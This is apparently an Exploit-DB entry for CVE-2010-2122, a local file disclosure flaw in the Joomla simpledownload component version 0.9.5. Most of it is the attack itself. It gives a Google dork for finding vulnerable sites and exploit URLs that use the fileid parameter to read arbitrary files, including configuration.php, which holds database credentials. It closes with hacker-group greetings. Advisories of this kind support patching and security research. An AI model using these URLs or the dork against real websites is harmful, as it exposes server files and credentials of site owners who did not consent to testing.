Joomla Component simpledownload 0.9.5 - Local File Disclosure

2010-05-16T00:00:00
ID EDB-ID:12623
Type exploitdb
Reporter ALTBTA
Modified 2010-05-16T00:00:00

Description

Joomla Component simpledownload Local File Disclosure. CVE-2010-2122. Webapps exploit for php platform

                                        
                                            [!]==========================================[!]

[~] Joomla Component simpledownload Remote File Disclouse
[~] Author : altbta (l_9@hotmail.com)
[~] Homepage : [ v4-team.com ] & [ xp10.me ]
[~] Date : 16 Mei, 2010

[!]==========================================[!]

[ Software Information ]

[+] Vendor : http://joomla.joelrowley.com/
[+] Price : free
[+] Vulnerability : Remote File Disclouse
[+] Dork : inurl:"com_simpledownload" ;)
[+] Version : 0.9.5 maybe lower also affected

[!]==========================================[!]

===[ Exploit ]===

http://site/index.php?option=com_simpledownload&task=download&fileid=[file]
http://site/index.php?option=com_simpledownload&task=download&fileid=/configuration.php

[!]=========~~{  altbta }~~=========[!]

RoMaNcYxHaCkEr & sad hacker & ab0-3th4b & Mr.SaFa7 & Mn7oS & V ! V 3
Evil-Cod3r & asL-Sabia & ! Dr.www ! & MaKKaWi & ZaIdOoHxHaCkEr & al.bito
SnIpEr.SiTeS & ابو الجازي & اورنج مان